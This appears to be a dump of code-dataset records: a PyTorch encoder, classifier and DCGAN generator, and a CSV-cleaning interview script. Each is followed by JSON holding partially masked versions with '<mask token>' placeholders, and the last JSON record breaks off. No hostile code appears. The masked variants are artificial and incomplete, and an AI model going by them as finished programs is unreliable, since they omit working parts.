        # max-pool in forward(): 28 -> 24 -> 12 -> 8 -> 4 spatially.
        # (Creation order is kept stable for reproducible initialization.)
        self.conv1 = nn.Conv2d(1, 32, kernel_size=5, stride=1)
        self.bn1 = nn.BatchNorm2d(32)
        self.conv2 = nn.Conv2d(32, 48, kernel_size=5, stride=1)
        self.bn2 = nn.BatchNorm2d(48)

    def forward(self, x):
        # Collapse colour channels to a single channel by averaging,
        # keeping the channel dimension for the first convolution.
        x = x.mean(dim=1, keepdim=True)
        for conv, bn in ((self.conv1, self.bn1), (self.conv2, self.bn2)):
            x = F.max_pool2d(F.relu(bn(conv(x))), stride=2, kernel_size=2,
                             dilation=(1, 1))
        # Flatten to (batch, 48*4*4) for the classifier head.
        return x.view(x.size(0), 48 * 4 * 4)
class Classifier(nn.Module):
    """Three-layer MLP head over the 48*4*4 encoder features (10-way output)."""

    def __init__(self, args, prob=0.5):
        super(Classifier, self).__init__()
        # Layer creation order is kept stable for reproducible initialization.
        self.fc1 = nn.Linear(48 * 4 * 4, 100)
        self.bn1_fc = nn.BatchNorm1d(100)
        self.fc2 = nn.Linear(100, 100)
        self.bn2_fc = nn.BatchNorm1d(100)
        self.fc3 = nn.Linear(100, 10)
        self.bn_fc3 = nn.BatchNorm1d(10)  # created but not used in forward()
        self.prob = prob
        # Flags copied from the experiment configuration; not consulted in
        # this forward pass.
        self.use_drop = args.use_drop
        self.use_bn = args.use_bn
        self.use_gumbel = args.use_gumbel

    def forward(self, x):
        # Two hidden stages of dropout -> linear -> batch-norm -> ReLU,
        # then a final dropout before the logits layer.
        for fc, bn in ((self.fc1, self.bn1_fc), (self.fc2, self.bn2_fc)):
            x = F.dropout(x, training=self.training, p=self.prob)
            x = F.relu(bn(fc(x)))
        x = F.dropout(x, training=self.training, p=self.prob)
        return self.fc3(x)
class Generator(nn.Module):
    """DCGAN-style generator: latent (nz, 1, 1) noise -> 1-channel 28x28 image."""

    def __init__(self, nz=100):
        super(Generator, self).__init__()
        # Transposed-conv upsampling path; spatial size: 1 -> 4 -> 7 -> 14 -> 28.
        layers = [
            nn.ConvTranspose2d(nz, 512, 4, 1, 0, bias=False),
            nn.BatchNorm2d(512),
            nn.ReLU(True),
            nn.ConvTranspose2d(512, 256, 3, 2, 1, bias=False),
            nn.BatchNorm2d(256),
            nn.ReLU(True),
            nn.ConvTranspose2d(256, 128, 4, 2, 1, bias=False),
            nn.BatchNorm2d(128),
            nn.ReLU(True),
            nn.ConvTranspose2d(128, 1, 4, 2, 1, bias=False),
            nn.Tanh(),  # squashes output pixels into [-1, 1]
        ]
        self.network = nn.Sequential(*layers)

    def forward(self, x):
        # x: (batch, nz, 1, 1) latent noise -> (batch, 1, 28, 28) image.
        return self.network(x)
|
normal
|
{
"blob_id": "9140da0b6c04f39a987a177d56321c56c01586e8",
"index": 3739,
"step-1": "<mask token>\n\n\nclass Classifier(nn.Module):\n\n def __init__(self, args, prob=0.5):\n super(Classifier, self).__init__()\n self.fc1 = nn.Linear(48 * 4 * 4, 100)\n self.bn1_fc = nn.BatchNorm1d(100)\n self.fc2 = nn.Linear(100, 100)\n self.bn2_fc = nn.BatchNorm1d(100)\n self.fc3 = nn.Linear(100, 10)\n self.bn_fc3 = nn.BatchNorm1d(10)\n self.prob = prob\n self.use_drop = args.use_drop\n self.use_bn = args.use_bn\n self.use_gumbel = args.use_gumbel\n <mask token>\n\n\nclass Generator(nn.Module):\n\n def __init__(self, nz=100):\n super(Generator, self).__init__()\n self.network = nn.Sequential(nn.ConvTranspose2d(nz, 512, 4, 1, 0,\n bias=False), nn.BatchNorm2d(512), nn.ReLU(True), nn.\n ConvTranspose2d(512, 256, 3, 2, 1, bias=False), nn.BatchNorm2d(\n 256), nn.ReLU(True), nn.ConvTranspose2d(256, 128, 4, 2, 1, bias\n =False), nn.BatchNorm2d(128), nn.ReLU(True), nn.ConvTranspose2d\n (128, 1, 4, 2, 1, bias=False), nn.Tanh())\n\n def forward(self, x):\n x = self.network(x)\n return x\n",
"step-2": "<mask token>\n\n\nclass Encoder(nn.Module):\n <mask token>\n <mask token>\n\n\nclass Classifier(nn.Module):\n\n def __init__(self, args, prob=0.5):\n super(Classifier, self).__init__()\n self.fc1 = nn.Linear(48 * 4 * 4, 100)\n self.bn1_fc = nn.BatchNorm1d(100)\n self.fc2 = nn.Linear(100, 100)\n self.bn2_fc = nn.BatchNorm1d(100)\n self.fc3 = nn.Linear(100, 10)\n self.bn_fc3 = nn.BatchNorm1d(10)\n self.prob = prob\n self.use_drop = args.use_drop\n self.use_bn = args.use_bn\n self.use_gumbel = args.use_gumbel\n\n def forward(self, x):\n x = F.dropout(x, training=self.training, p=self.prob)\n x = F.relu(self.bn1_fc(self.fc1(x)))\n x = F.dropout(x, training=self.training, p=self.prob)\n x = F.relu(self.bn2_fc(self.fc2(x)))\n x = F.dropout(x, training=self.training, p=self.prob)\n x = self.fc3(x)\n return x\n\n\nclass Generator(nn.Module):\n\n def __init__(self, nz=100):\n super(Generator, self).__init__()\n self.network = nn.Sequential(nn.ConvTranspose2d(nz, 512, 4, 1, 0,\n bias=False), nn.BatchNorm2d(512), nn.ReLU(True), nn.\n ConvTranspose2d(512, 256, 3, 2, 1, bias=False), nn.BatchNorm2d(\n 256), nn.ReLU(True), nn.ConvTranspose2d(256, 128, 4, 2, 1, bias\n =False), nn.BatchNorm2d(128), nn.ReLU(True), nn.ConvTranspose2d\n (128, 1, 4, 2, 1, bias=False), nn.Tanh())\n\n def forward(self, x):\n x = self.network(x)\n return x\n",
"step-3": "<mask token>\n\n\nclass Encoder(nn.Module):\n\n def __init__(self):\n super(Encoder, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, kernel_size=5, stride=1)\n self.bn1 = nn.BatchNorm2d(32)\n self.conv2 = nn.Conv2d(32, 48, kernel_size=5, stride=1)\n self.bn2 = nn.BatchNorm2d(48)\n <mask token>\n\n\nclass Classifier(nn.Module):\n\n def __init__(self, args, prob=0.5):\n super(Classifier, self).__init__()\n self.fc1 = nn.Linear(48 * 4 * 4, 100)\n self.bn1_fc = nn.BatchNorm1d(100)\n self.fc2 = nn.Linear(100, 100)\n self.bn2_fc = nn.BatchNorm1d(100)\n self.fc3 = nn.Linear(100, 10)\n self.bn_fc3 = nn.BatchNorm1d(10)\n self.prob = prob\n self.use_drop = args.use_drop\n self.use_bn = args.use_bn\n self.use_gumbel = args.use_gumbel\n\n def forward(self, x):\n x = F.dropout(x, training=self.training, p=self.prob)\n x = F.relu(self.bn1_fc(self.fc1(x)))\n x = F.dropout(x, training=self.training, p=self.prob)\n x = F.relu(self.bn2_fc(self.fc2(x)))\n x = F.dropout(x, training=self.training, p=self.prob)\n x = self.fc3(x)\n return x\n\n\nclass Generator(nn.Module):\n\n def __init__(self, nz=100):\n super(Generator, self).__init__()\n self.network = nn.Sequential(nn.ConvTranspose2d(nz, 512, 4, 1, 0,\n bias=False), nn.BatchNorm2d(512), nn.ReLU(True), nn.\n ConvTranspose2d(512, 256, 3, 2, 1, bias=False), nn.BatchNorm2d(\n 256), nn.ReLU(True), nn.ConvTranspose2d(256, 128, 4, 2, 1, bias\n =False), nn.BatchNorm2d(128), nn.ReLU(True), nn.ConvTranspose2d\n (128, 1, 4, 2, 1, bias=False), nn.Tanh())\n\n def forward(self, x):\n x = self.network(x)\n return x\n",
"step-4": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Encoder(nn.Module):\n\n def __init__(self):\n super(Encoder, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, kernel_size=5, stride=1)\n self.bn1 = nn.BatchNorm2d(32)\n self.conv2 = nn.Conv2d(32, 48, kernel_size=5, stride=1)\n self.bn2 = nn.BatchNorm2d(48)\n\n def forward(self, x):\n x = torch.mean(x, 1).view(x.size()[0], 1, x.size()[2], x.size()[3])\n x = F.max_pool2d(F.relu(self.bn1(self.conv1(x))), stride=2,\n kernel_size=2, dilation=(1, 1))\n x = F.max_pool2d(F.relu(self.bn2(self.conv2(x))), stride=2,\n kernel_size=2, dilation=(1, 1))\n x = x.view(x.size(0), 48 * 4 * 4)\n return x\n\n\nclass Classifier(nn.Module):\n\n def __init__(self, args, prob=0.5):\n super(Classifier, self).__init__()\n self.fc1 = nn.Linear(48 * 4 * 4, 100)\n self.bn1_fc = nn.BatchNorm1d(100)\n self.fc2 = nn.Linear(100, 100)\n self.bn2_fc = nn.BatchNorm1d(100)\n self.fc3 = nn.Linear(100, 10)\n self.bn_fc3 = nn.BatchNorm1d(10)\n self.prob = prob\n self.use_drop = args.use_drop\n self.use_bn = args.use_bn\n self.use_gumbel = args.use_gumbel\n\n def forward(self, x):\n x = F.dropout(x, training=self.training, p=self.prob)\n x = F.relu(self.bn1_fc(self.fc1(x)))\n x = F.dropout(x, training=self.training, p=self.prob)\n x = F.relu(self.bn2_fc(self.fc2(x)))\n x = F.dropout(x, training=self.training, p=self.prob)\n x = self.fc3(x)\n return x\n\n\nclass Generator(nn.Module):\n\n def __init__(self, nz=100):\n super(Generator, self).__init__()\n self.network = nn.Sequential(nn.ConvTranspose2d(nz, 512, 4, 1, 0,\n bias=False), nn.BatchNorm2d(512), nn.ReLU(True), nn.\n ConvTranspose2d(512, 256, 3, 2, 1, bias=False), nn.BatchNorm2d(\n 256), nn.ReLU(True), nn.ConvTranspose2d(256, 128, 4, 2, 1, bias\n =False), nn.BatchNorm2d(128), nn.ReLU(True), nn.ConvTranspose2d\n (128, 1, 4, 2, 1, bias=False), nn.Tanh())\n\n def forward(self, x):\n x = self.network(x)\n return x\n",
"step-5": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Encoder(nn.Module):\n def __init__(self):\n super(Encoder, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, kernel_size=5, stride=1)\n self.bn1 = nn.BatchNorm2d(32)\n self.conv2 = nn.Conv2d(32, 48, kernel_size=5, stride=1)\n self.bn2 = nn.BatchNorm2d(48)\n\n def forward(self, x):\n x = torch.mean(x, 1).view(x.size()[0], 1, x.size()[2], x.size()[3])\n x = F.max_pool2d(F.relu(self.bn1(self.conv1(x))), stride=2, kernel_size=2, dilation=(1, 1))\n x = F.max_pool2d(F.relu(self.bn2(self.conv2(x))), stride=2, kernel_size=2, dilation=(1, 1))\n #print(x.size())\n x = x.view(x.size(0), 48*4*4)\n return x\n\n\nclass Classifier(nn.Module):\n def __init__(self, args, prob=0.5):\n super(Classifier, self).__init__()\n self.fc1 = nn.Linear(48*4*4, 100)\n self.bn1_fc = nn.BatchNorm1d(100)\n self.fc2 = nn.Linear(100, 100)\n self.bn2_fc = nn.BatchNorm1d(100)\n self.fc3 = nn.Linear(100, 10)\n self.bn_fc3 = nn.BatchNorm1d(10)\n self.prob = prob\n self.use_drop = args.use_drop\n self.use_bn = args.use_bn\n self.use_gumbel = args.use_gumbel\n\n def forward(self, x):\n x = F.dropout(x, training=self.training, p=self.prob)\n x = F.relu(self.bn1_fc(self.fc1(x)))\n x = F.dropout(x, training=self.training, p=self.prob)\n x = F.relu(self.bn2_fc(self.fc2(x)))\n x = F.dropout(x, training=self.training, p=self.prob)\n x = self.fc3(x)\n return x\n\n\nclass Generator(nn.Module):\n def __init__(self, nz=100):\n super(Generator, self).__init__()\n self.network = nn.Sequential(\n # input is Z, going into a convolution\n nn.ConvTranspose2d(nz, 512, 4, 1, 0, bias=False),\n nn.BatchNorm2d(512),\n nn.ReLU(True),\n\n # state size. (ngf*8) x 4 x 4\n nn.ConvTranspose2d(512, 256, 3, 2, 1, bias=False),\n nn.BatchNorm2d(256),\n nn.ReLU(True),\n\n # state size. (ngf*2) x 8 x 8\n nn.ConvTranspose2d(256, 128, 4, 2, 1, bias=False),\n nn.BatchNorm2d(128),\n nn.ReLU(True),\n\n # state size. 
(ngf) x 16 x 16\n nn.ConvTranspose2d(128, 1, 4, 2, 1, bias=False),\n nn.Tanh()\n # state size. (nc) x 32 x 32\n )\n\n def forward(self, x):\n # print(x.shape) # torch.Size([64, 100, 1, 1])\n x = self.network(x)\n # print(x.shape) # torch.Size([64, 1, 28, 28])\n\n return x\n\n",
"step-ids": [
5,
7,
8,
10,
11
]
}
|
[
5,
7,
8,
10,
11
] |
#Created by Jake Hansen for Zebra interview take home assessment, July 2020.
import csv, os, sys, pickle
from datetime import date
class DataSource:
    """Summary record for one processed input file.

    Stores the file name, the counts of accepted ('good') and rejected
    ('bad') rows, and the column-index mapping that was used - useful both
    as a daily log entry and to remember field positions for files with
    many columns.
    """

    def __init__(self, name, usableRows, errorRows, indices):
        # Plain attribute assignment; instances are pickled for daily logging.
        self.name, self.usableRows = name, usableRows
        self.errorRows, self.indices = errorRows, indices
def getHeaderIndexes(indices, headers):
    """Locate each output-schema column in a file's header row.

    Requires: an ``indices`` dict pre-populated with the seven schema
        column names, and the header row of a CSV file.
    Returns: a ``(indices, valid)`` pair where ``indices`` maps each schema
        column name to its position within the row and ``valid`` is True
        only when every required column was found.

    Unlike the original implementation this operates on a copy of
    *indices*, so the caller's dict is never mutated and each file gets its
    own mapping (previously every pickled per-file mapping aliased one
    shared dict object).
    """
    expected = ('Provider Name', 'CampaignID', 'Cost Per Ad Click',
                'Redirect Link', 'Phone Number', 'Address', 'Zipcode')
    result = dict(indices)  # copy: do not mutate the caller's shared dict
    found = set()
    for position, header in enumerate(headers):
        name = header.strip()
        if name in expected:
            # Last occurrence wins, matching the original behavior.
            result[name] = position
            found.add(name)
    valid = len(found) == len(expected)
    return result, valid
def isRowValid(indices, row):
    """Return True when *row* can be emitted under the output schema.

    Non-nullable string columns must hold a non-empty value other than the
    literal 'NULL'; 'Cost Per Ad Click' must parse as a float once any
    surrounding quotes are stripped. 'Phone Number' is nullable, so any
    value (including empty) is accepted - its column's presence was already
    verified by getHeaderIndexes.
    """
    # String non-nullables.
    for column in ('Provider Name', 'CampaignID', 'Redirect Link',
                   'Address', 'Zipcode'):
        value = row[indices[column]].strip()
        if not value or value == 'NULL':
            return False
    # Float non-nullables.
    for column in ('Cost Per Ad Click',):
        value = row[indices[column]].strip('"').strip("'")
        try:
            float(value)
        except ValueError:  # narrowed from a bare except: only bad numbers
            return False
    return True
def addUsableRow(indices, row, finalOutput):
    """Append a validated *row* to the output CSV string.

    Fields are emitted in the output-schema order, each wrapped in double
    quotes; an empty phone number becomes the literal NULL. Returns the
    grown output string.
    """
    def cell(column):
        # Strip any double quotes the source file put around the value.
        return row[indices[column]].strip('"')

    phone = row[indices['Phone Number']]
    phone = 'NULL' if phone == '' else phone.strip('"')
    fields = (cell('Provider Name'), cell('CampaignID'),
              cell('Cost Per Ad Click'), cell('Redirect Link'), phone,
              cell('Address'), cell('Zipcode'))
    return finalOutput + '"' + '","'.join(fields) + '"' + '\n'
def addErrorRow(indices, row, errorFinalOutput):
    """Append a rejected *row* to the error report string.

    The row is prefixed with an 'Error:' marker line and re-joined with
    commas. *indices* is accepted for signature symmetry with the other row
    handlers but is not consulted. Returns the grown report string, which
    is printed at the end of the daily run.
    """
    entry = 'Error: ' + '\n'
    if row:
        entry += ','.join(row) + '\n'
    return errorFinalOutput + entry
#Variables and data structures
# Accumulator strings: finalOutput starts with the output header row,
# errorFinalOutput collects rejected rows for printing at the end.
# NOTE(review): the header says 'RedirectLink' (no space) and pads columns
# with spaces, unlike the data rows - confirm downstream consumers expect it.
finalOutput = 'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode' + '\n'
errorFinalOutput = ''
# Output paths are date-stamped per daily run; the commented *Test variants
# point at local test directories ('pickel' spelling kept as-is).
# outputFileName = 'outputFilesTest/ZebraAssignmentOutput-' + str(date.today()) + '.csv'
outputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()) + '.csv'
pickelFileName = 'pickle/' + str(date.today())
# pickelFileName = 'pickleTest/' + str(date.today())
pickleDict = {}  # per-input-file column-index mappings, pickled at the end
maxLines = 99999  # line budget checked cumulatively across the input files
dataSources = []  # DataSource log entries, one per input file
# Template mapping of output-schema column name -> index in a source row;
# getHeaderIndexes fills in the real positions for each file's header.
indices = {
    "Provider Name": 0,
    "CampaignID": 0,
    "Cost Per Ad Click": 0,
    "Redirect Link": 0,
    "Phone Number": 0,
    "Address": 0,
    "Zipcode": 0
}
# Input files are discovered from a directory; for local testing a hard-coded
# list of paths (e.g. ['inputFilesTest/Auto.csv', 'inputFilesTest/Home.csv'])
# can be substituted for the os.listdir() call below.
inputDirectory = 'inputFiles'

# Pre-flight validation: bail out before parsing if the inputs are too large
# or a non-CSV file is present.
# NOTE(review): currentLines accumulates across files, so maxLines caps the
# combined batch size, not each individual file - confirm that is intended.
currentLines = 0
for file in os.listdir(inputDirectory):
    # Count lines with the handle closed afterwards; the original generator
    # expression called open() inline and leaked one file descriptor per file.
    with open(inputDirectory + '/' + file) as lineCounter:
        currentLines += sum(1 for line in lineCounter)
    if currentLines > maxLines:
        sys.exit('Error: Too many lines')
    # NOTE(review): suffix check is case-sensitive and matches any name ending
    # in 'csv' (e.g. 'notcsv') - confirm that is acceptable.
    if file[-3:] != 'csv':
        sys.exit('Error: Given file not a .csv file')
#Main Algorithm loop through all files in the list
# For each CSV: read the header, map the schema columns, then route every
# data row either into the final output or into the error report.
for file in os.listdir(inputDirectory):
# for file in inputList:
    #usableRows and errorRows used for storing information from each data source
    usableRows = 0
    errorRows = 0
    # with open(file, newline='') as f:
    with open(inputDirectory + '/' + file, newline='') as f:
        reader = csv.reader(f)
        try:
            headers = next(reader)
        except:
            # Empty file: there is no header row, so treat it as missing.
            headers = ''
        indicesCurrent, valid = getHeaderIndexes(indices, headers)
        if valid == True:
            # Header has all required columns: route each row by validity.
            for row in reader:
                if isRowValid(indicesCurrent, row):
                    finalOutput = addUsableRow(indicesCurrent,row, finalOutput)
                    usableRows += 1
                else:
                    errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)
                    errorRows += 1
            # Remember this file's column mapping for the pickled master dict.
            # NOTE(review): pickleDict entries may all alias one dict object if
            # getHeaderIndexes returns its mutated input - verify per-file copies.
            pickleDict[file] = indicesCurrent
        else:
            # Unusable header: every remaining row goes to the error report.
            for row in reader:
                errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)
                errorRows += 1
    f.close()  # redundant: the with-block already closed f (no-op here)
    #Add dataSource Information for possible future needs and logging purposes
    # NOTE(review): this passes the module-level `indices` template rather than
    # indicesCurrent - confirm the per-file mapping was not intended here.
    newDataSource = DataSource(file,usableRows, errorRows, indices)
    dataSources.append(newDataSource)
#Create file with rows containing correct schema
with open(outputFileName, 'w+') as f:
f.write(finalOutput)
f.close()
#print the incorrect rows
print(errorFinalOutput)
#Create Pickel file containing data source info for daily logging
with open(pickelFileName, 'wb') as f:
pickle.dump(dataSources, f)
f.close()
#Create Pickle File dictionary with indices specific info for filenames
with open('pickle/masterDict', 'wb') as f:
pickle.dump(pickleDict, f)
f.close()
#Thank you line
print("Thanks for taking the time to look at my code and consider me for this position. Cheers!")
|
normal
|
{
"blob_id": "38c1b82a29a5ad0b4581e63fb083ca2487a79817",
"index": 9544,
"step-1": "<mask token>\n\n\nclass DataSource:\n\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a, b, c, d, e, f, g = False, False, False, False, False, False, False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if (a == True and b == True and c == True and d == True and e == True and\n f == True and g == True):\n valid = True\n else:\n valid = False\n return indices, valid\n\n\n<mask token>\n\n\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn = 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n temp = ('\"' + pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' +\n phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n')\n finalOutput += temp\n return finalOutput\n\n\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return 
errorFinalOutput\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass DataSource:\n\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a, b, c, d, e, f, g = False, False, False, False, False, False, False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if (a == True and b == True and c == True and d == True and e == True and\n f == True and g == True):\n valid = True\n else:\n valid = False\n return indices, valid\n\n\ndef isRowValid(indices, row):\n sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address',\n 'Zipcode']\n for column in sNNs:\n currentCheck = row[indices[column]].strip()\n if isinstance(currentCheck, str) and len(currentCheck\n ) > 0 and currentCheck != 'NULL':\n pass\n else:\n return False\n fNNs = ['Cost Per Ad Click']\n for column in fNNs:\n currentCheck = row[indices[column]].strip('\"')\n currentCheck = currentCheck.strip(\"'\")\n try:\n float(currentCheck)\n except:\n return False\n sNs = ['Phone Number']\n return True\n\n\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn 
= 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n temp = ('\"' + pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' +\n phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n')\n finalOutput += temp\n return finalOutput\n\n\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass DataSource:\n\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a, b, c, d, e, f, g = False, False, False, False, False, False, False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if (a == True and b == True and c == True and d == True and e == True and\n f == True and g == True):\n valid = True\n else:\n valid = False\n return indices, valid\n\n\ndef isRowValid(indices, row):\n sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address',\n 'Zipcode']\n for column in sNNs:\n currentCheck = row[indices[column]].strip()\n if isinstance(currentCheck, str) and len(currentCheck\n ) > 0 and currentCheck != 'NULL':\n pass\n else:\n return False\n fNNs = ['Cost Per Ad Click']\n for column in fNNs:\n currentCheck = row[indices[column]].strip('\"')\n currentCheck = currentCheck.strip(\"'\")\n try:\n float(currentCheck)\n except:\n return False\n sNs = ['Phone Number']\n return True\n\n\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn 
= 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n temp = ('\"' + pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' +\n phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n')\n finalOutput += temp\n return finalOutput\n\n\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n\nfinalOutput = (\n 'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode'\n + '\\n')\nerrorFinalOutput = ''\noutputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()\n ) + '.csv'\npickelFileName = 'pickle/' + str(date.today())\npickleDict = {}\nmaxLines = 99999\ndataSources = []\nindices = {'Provider Name': 0, 'CampaignID': 0, 'Cost Per Ad Click': 0,\n 'Redirect Link': 0, 'Phone Number': 0, 'Address': 0, 'Zipcode': 0}\ninputDirectory = 'inputFiles'\ncurrentLines = 0\nfor file in os.listdir(inputDirectory):\n currentLines += sum(1 for line in open(inputDirectory + '/' + file))\n if currentLines > maxLines:\n sys.exit('Error: Too many lines')\n if file[-3:] != 'csv':\n sys.exit('Error: Given file not a .csv file')\nfor file in os.listdir(inputDirectory):\n usableRows = 0\n errorRows = 0\n with open(inputDirectory + '/' + file, newline='') as f:\n reader = csv.reader(f)\n try:\n headers = next(reader)\n except:\n headers = ''\n indicesCurrent, valid = getHeaderIndexes(indices, headers)\n if valid == True:\n for row in reader:\n if isRowValid(indicesCurrent, row):\n finalOutput = addUsableRow(indicesCurrent, row, finalOutput\n )\n usableRows += 1\n else:\n errorFinalOutput = addErrorRow(indicesCurrent, row,\n errorFinalOutput)\n errorRows += 1\n pickleDict[file] = indicesCurrent\n else:\n for row in reader:\n errorFinalOutput = addErrorRow(indicesCurrent, row,\n errorFinalOutput)\n 
errorRows += 1\n f.close()\n newDataSource = DataSource(file, usableRows, errorRows, indices)\n dataSources.append(newDataSource)\nwith open(outputFileName, 'w+') as f:\n f.write(finalOutput)\nf.close()\nprint(errorFinalOutput)\nwith open(pickelFileName, 'wb') as f:\n pickle.dump(dataSources, f)\nf.close()\nwith open('pickle/masterDict', 'wb') as f:\n pickle.dump(pickleDict, f)\nf.close()\nprint(\n 'Thanks for taking the time to look at my code and consider me for this position. Cheers!'\n )\n",
"step-4": "import csv, os, sys, pickle\nfrom datetime import date\n\n\nclass DataSource:\n\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a, b, c, d, e, f, g = False, False, False, False, False, False, False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if (a == True and b == True and c == True and d == True and e == True and\n f == True and g == True):\n valid = True\n else:\n valid = False\n return indices, valid\n\n\ndef isRowValid(indices, row):\n sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address',\n 'Zipcode']\n for column in sNNs:\n currentCheck = row[indices[column]].strip()\n if isinstance(currentCheck, str) and len(currentCheck\n ) > 0 and currentCheck != 'NULL':\n pass\n else:\n return False\n fNNs = ['Cost Per Ad Click']\n for column in fNNs:\n currentCheck = row[indices[column]].strip('\"')\n currentCheck = currentCheck.strip(\"'\")\n try:\n float(currentCheck)\n except:\n return False\n sNs = ['Phone Number']\n return True\n\n\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if 
